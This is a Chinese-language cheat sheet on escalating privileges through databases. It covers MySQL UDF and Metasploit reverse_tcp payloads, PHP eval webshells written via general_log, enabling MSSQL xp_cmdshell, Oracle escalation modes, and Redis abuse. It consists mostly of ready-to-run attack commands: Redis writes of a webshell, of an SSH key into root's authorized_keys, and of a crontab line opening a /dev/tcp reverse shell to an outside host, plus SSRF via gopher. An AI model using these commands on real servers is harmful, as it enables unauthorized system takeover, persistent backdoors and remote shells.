数据库提权总结

Mysql提权

UDF提权是利用MYSQL的自定义函数功能，将MYSQL账号转化为系统system权限

前提：

1.UDF提权条件

（1）Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。

（2）Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32，在windows2000下放置于c:\winnt\system32。

（3）掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数，一般以root账号为佳，具备`root账号所具备的权限的其它账号也可以。

（4）可以将udf.dll写入到相应目录的权限。

 secure_file_priv为空

show global variables like 'secure%';
    当 secure_file_priv 的值为 NULL ，表示限制 mysqld 不允许导入|导出，此时无法提权
    当 secure_file_priv 的值为 /tmp/ ，表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下，此时也无法提权
     当 secure_file_priv 的值没有具体值时，表示不对 mysqld 的导入|导出做限制，此时可提权

提权步骤：获取密码-开启外联-高版本创建目录-MSF导出dll

Mysql版本查询命令

SELECT @@version`、`SELECT  version();

Mysql写马

set global general_log = ON;开启日志
set global general_log_file = "C:/phpstudy_pro/WWW/shell.php"
select '<?php eval($_POST[shell]);?>'

提权方法

select version();//获取数据库版本
select user();//获取数据库用户
select @@basedir ;//获取安装目录
show variables like '%plugins%';  //寻找mysql安装路径
GRANT ALL PRIVILEGES ON *.* TO '帐号'@'%' IDENTIFIED BY '密码' WITH GRANT OPTION; //开启外联

利用MSF的exploit/multi/mysql/mysql_udf_payload导出udf dll文件

use exploit/multi/mysql/mysql_udf_payload
set payload windows/meterpreter/reverse_tcp
set password root
set rhosts 10.10.10.1 (这里更换了靶机)
run

 
create function sys_eval returns string soname "WqkerHcA.dll";//创建函数绑定dll

使用方法：

select sys_eval("whoami");//调用函数进行命令执行

MSSQL

1.使用xp_cmdshell进行提权

如果用户拥有管理员sa权限则可以用sp_configure重修开启它

启用xp_cmdshell

EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

关闭

exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
reconfigure;

执行

EXEC master.dbo.xp_cmdshell '命令'
如果xp_cmdshell被删除了，可以上传xplog70.dll进行恢复
exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'

Oracle- 普通用户&注入提升模式&DBA模式

1、普通用户模式：

前提是拥有一个普通的oracle连接账号，不需要DBA权限，可提权至DBA，并以oracle实例运行的权限执行操作系统命令。

2、DBA用户模式：（自动化工具演示）

拥有DBA账号密码，可以省去自己手动创建存储过程的繁琐步骤，一键执行测试。

3、注入提升模式：（Sqlmap测试演示）

拥有一个oracle注入点，可以通过注入点直接执行系统命令，此种模式没有实现回显

redis

1.利用redis写入webshell

前提条件

• 可以成功远程连接，并且未作登录验证

• 知道网站的绝对路径，并且具有写入权限
  连接redis

  redis-cli -h 10.0.20.99
  config set dir /opt/lampp/htdocs/temp
  config set dbfilename redis.php
  set x "\r\n\r\n<?php phpinfo();eval($_POST['shell']);?>"

2 写入SSH公钥

ssh-keygen -t rsa  //生成RSA公私钥
(echo -e "\r\n";cat id_rsa.pub;echo -e "\r\n";) > 1.txt  //将生成的公钥添加换行输出为1.txt
config set dir /root/.ssh  //修改redis路径为ssh的公钥路径
config set dbfilename authorized_keys  //修改文件名
cat /root/.ssh/1.txt | redis-cli -h 192.168.30.103 -x set x
ssh -i id_rsa [email protected]  //写入公钥文件
ssh -i id_rsa [email protected]  //成功登录靶机

3.利用crontab反弹shell

redis写入定时计划

config set dir /var/spool/cron  //修改redis路径为crontab的路径
config set dbfilename root  //修改文件名，修改完记得save一下
set x "\r\n*/1 * * * * /bin/bash -i>& /dev/tcp/192.168.30.102/6666 0>&1\r\n"
//写入定时计划

4.SSRF&Gopher&Redis

如果Redis在内网，无法直接访问，可以通过SSRF访问利用

gopher协议支持发出GET、POST请求：可以先获取get请求包和post请求包，再构成符合gopher协议的请求。

gopher协议格式

gopher://<host>:<port>/<gopher-path>_后接TCP数据流

4.redis主从复制RCE